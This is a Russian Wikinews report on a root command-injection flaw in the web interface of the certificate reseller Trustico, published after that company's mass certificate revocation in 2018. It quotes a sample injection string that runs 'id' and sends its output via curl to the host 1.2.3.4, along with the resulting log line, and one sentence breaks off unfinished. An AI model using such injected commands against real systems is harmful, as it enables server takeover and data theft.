Ожидается отзыв всех остальных сертификатов Trustico из-за полной компрометации сервера

Материал из Викиновостей, свободного источника новостей

2 марта 2018 года

Вчерашняя история с отзывом 23 тысяч сертификатов, выданных через реселлера Trustico, получала неожиданное продолжение. Один из исследователей безопасности раскрыл тривиальную уязвимость в web-интерфейсе, позволяющую получить root-доступ на сервер.

Проблема свидетельствует о наплевательском отношении к безопасности и косвенно подтверждает, что действия Trustico по отзыву сертификатов были связаны с инцидентом с безопасностью, несмотря на то, что компания отвергала подобные предположения. По информации от исследователя, продемонстрировавшего уязвимость, о проблеме было известно ранее и он почерпнул сведения из публичных источников. Суть выявленной уязвимости в передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов. В частности, если ввести shell-операторы в поле ввода домена в форме проверки корректности установки сертификата, то они будут исполнены на сервере с правами root.

Например, при вводе вместо имени проверяемого домена строки "$(curl http://1.2.3.4/`id`(недоступная ссылка))" на хост 1.2.3.4 придёт запрос вида:


1.2.3.4 - [02/Mar/2018:09:52:14] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"

В настоящее время сайт

Источники[править]


Creative Commons
Creative Commons
Эта статья содержит материалы из статьи «Ожидается отзыв всех остальных сертификатов Trustico из-за полной компрометации сервера», опубликованной OpenNET и распространяющейся на условиях лицензии Creative Commons Attribution (CC BY) — указание автора, источник и лицензию.
Эта статья загружена автоматически ботом NewsBots в архив и ещё не проверялась редакторами Викиновостей.
Любой участник может оформить статью: добавить иллюстрации, викифицировать, заполнить шаблоны и добавить категории.
Любой редактор может снять этот шаблон после оформления и проверки.

Комментарии[править]

Викиновости и Wikimedia Foundation не несут ответственности за любые материалы и точки зрения, находящиеся на странице и в разделе комментариев.